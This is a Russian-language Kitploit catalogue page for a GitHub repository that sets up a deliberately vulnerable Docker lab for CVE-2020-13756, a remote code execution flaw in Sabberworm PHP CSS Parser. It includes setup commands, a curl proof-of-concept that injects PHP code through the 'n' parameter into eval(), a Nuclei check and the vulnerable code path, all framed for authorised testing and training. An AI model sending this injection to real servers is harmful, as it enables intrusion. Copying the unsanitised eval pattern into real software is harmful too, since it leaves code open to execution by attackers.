Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-13756-env — Уязвимая тестовая среда для CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
Инструменты/GitHubGitHub/kre80r/cve-2020-13756-env
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

Уязвимая тестовая среда для CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-13756 Уязвимая среда

Уязвимая тестовая среда для CVE-2020-13756 - удаленное выполнение кода в Sabberworm PHP CSS Parser.

Детали уязвимости

ПолеЗначение
CVECVE-2020-13756
ПродуктSabberworm PHP CSS Parser
Уязвимые версии< 8.3.1
СерьезностьКритическая (CVSS 9.8)
ТипУдаленное выполнение кода

Быстрый старт (одна строка)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

Или клонируйте и запустите:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

Ручная настройка

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

Проверка уязвимости

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

Ожидаемый вывод содержит VULN_TEST в начале, что доказывает выполнение кода.

Тест с Nuclei

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

Технические детали

Уязвимость существует в функции getSelectorsBySpecificity(), которая передает несанитизированный пользовательский ввод в eval():

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

Ссылки

  • NVD
  • Коммит с исправлением
  • Полное раскрытие
  • PacketStorm

Отказ от ответственности

Эта среда предназначена только для авторизованного тестирования безопасности. Не используйте против систем без разрешения.

Автор

KrE80r - Исследователь безопасности

Скачать инструмент